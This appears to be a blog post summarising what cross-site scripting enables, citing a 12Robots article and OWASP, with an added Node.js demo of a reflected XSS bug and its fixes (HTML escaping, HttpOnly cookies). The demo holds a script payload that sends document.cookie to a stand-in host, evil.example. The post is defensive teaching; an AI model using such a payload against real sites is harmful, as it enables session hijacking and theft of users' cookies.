Great Read: The perils of Cross-Site Scripting

[Figure: XSS Attack Overview | Courtesy of www.acunetix.com]

I have been searching the internet for a website that could easily describe the perils of cross-site scripting (XSS). Of course, some of you out there will argue that I should have visited OWASP. Yes, I have visited OWASP. However, I am still hungry for more information, and I am looking for a website that will explain to me what can be done with cross-site scripting, even if I am just a newbie on web technologies and languages. So, after doing some ctrl + click on the links provided by Google, I managed to find the website of Jason Dean, which discusses cross-site scripting: What is possible with XSS? | 12Robots.com.

According to him, there are several things that you can do with XSS, namely:

  • use the credibility of your site to run a phishing scheme

  • steal your users’ passwords

  • hijack your users’ sessions

  • try to launch an attack against the site administrator (you)

  • redirect your users to another site (gambling, porn, Google, affiliate link, whatever)

  • display inappropriate or mis-informative messages to your users

  • or anything else that could be done with client-side executable code

I was quite amazed by the things you can do with XSS. I had never thought that, using JavaScript, you could do pretty much anything in a browser. From a security standpoint, XSS is critical enough that it sits at number 3 (A3) in the OWASP Top 10 2013 (here is the PDF file directly from OWASP). So if you are the admin of a website affected by XSS, you should fix it immediately, since it can really affect the visitors of your site.
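To make the list above concrete, here is an added example (my own, not code from the original post or from 12Robots) of the smallest possible reflected-XSS sink and how the session-hijacking item on the list plays out against it. It runs under Node.js with no dependencies. The page template, the attacker's query string and the hostname evil.example are all constructed for this demo; the two fixes shown (HTML-encoding the reflected value, and marking the session cookie HttpOnly so an injected script cannot read it from document.cookie) are the standard ones and not specific to any framework.

```javascript
// Added example, not from the original post: a reflected-XSS sink, the payload
// that hijacks a session through it, and the two fixes a site admin would apply.

// Constructed attacker input, i.e. the value an attacker puts in a link such as
//   https://victim.example/search?q=<this>
// If it lands raw in the page, the browser runs it and ships the victim's cookies
// to an attacker-controlled host (evil.example is a hypothetical hostname).
const ATTACKER_QUERY =
  '<script>new Image().src="https://evil.example/c?"+document.cookie</script>';

// VULNERABLE: the query is concatenated straight into the HTML, so the attacker's
// <script> tag is parsed as part of the page. This is the bug the post warns about.
function renderResultsUnsafe(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Fix 1: encode the five HTML-significant characters before the value enters an
// HTML text or double-quoted attribute context. The browser then shows the payload
// as text instead of executing it.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: same template, but every reflected value goes through escapeHtml.
function renderResultsSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Demo-only check: does the rendered HTML still contain a raw <script tag?
// (Not a real XSS detector; it only illustrates the difference between the two
// renderers on this payload.)
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}

// Fix 2 (defence in depth, aimed at the "hijack your users' sessions" item):
// build the Set-Cookie header for the session cookie. With HttpOnly the cookie is
// still sent on requests but is invisible to document.cookie, so an injected
// script cannot exfiltrate it. Secure and SameSite=Lax are included as the usual
// companions; the cookie name "sid" is an assumption for the demo.
function sessionCookieHeader(sessionId, { httpOnly = true } = {}) {
  const attrs = ['Path=/', 'Secure', 'SameSite=Lax'];
  if (httpOnly) attrs.push('HttpOnly');
  return `sid=${encodeURIComponent(sessionId)}; ${attrs.join('; ')}`;
}

// Runs the payload through both renderers and returns the outcome, so the
// comparison can be inspected (or asserted on) rather than only printed.
function demo() {
  const unsafeHtml = renderResultsUnsafe(ATTACKER_QUERY);
  const safeHtml = renderResultsSafe(ATTACKER_QUERY);
  return {
    unsafeHtml,
    safeHtml,
    unsafeExecutes: containsRawScriptTag(unsafeHtml), // true: script runs
    safeExecutes: containsRawScriptTag(safeHtml),     // false: shown as text
    cookieHeader: sessionCookieHeader('abc123'),
  };
}

console.log(demo());
```

Running the block prints the same payload twice: once as live markup that the browser would execute, once encoded as `&lt;script&gt;…&lt;/script&gt;` that it would merely display. Encoding at the output point is the fix for the reflection itself; HttpOnly does not prevent the injection, it only takes the session cookie off the table if an injection is missed, which is why both belong together.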

References:

12Robots, Jason Dean: What's Possible with XSS? (Security Series #81), http://www.12robots.com/index.cfm/2010/9/14/Whats-Possible-with-XSS–Security-Series-81

OWASP Top 10 2013, https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
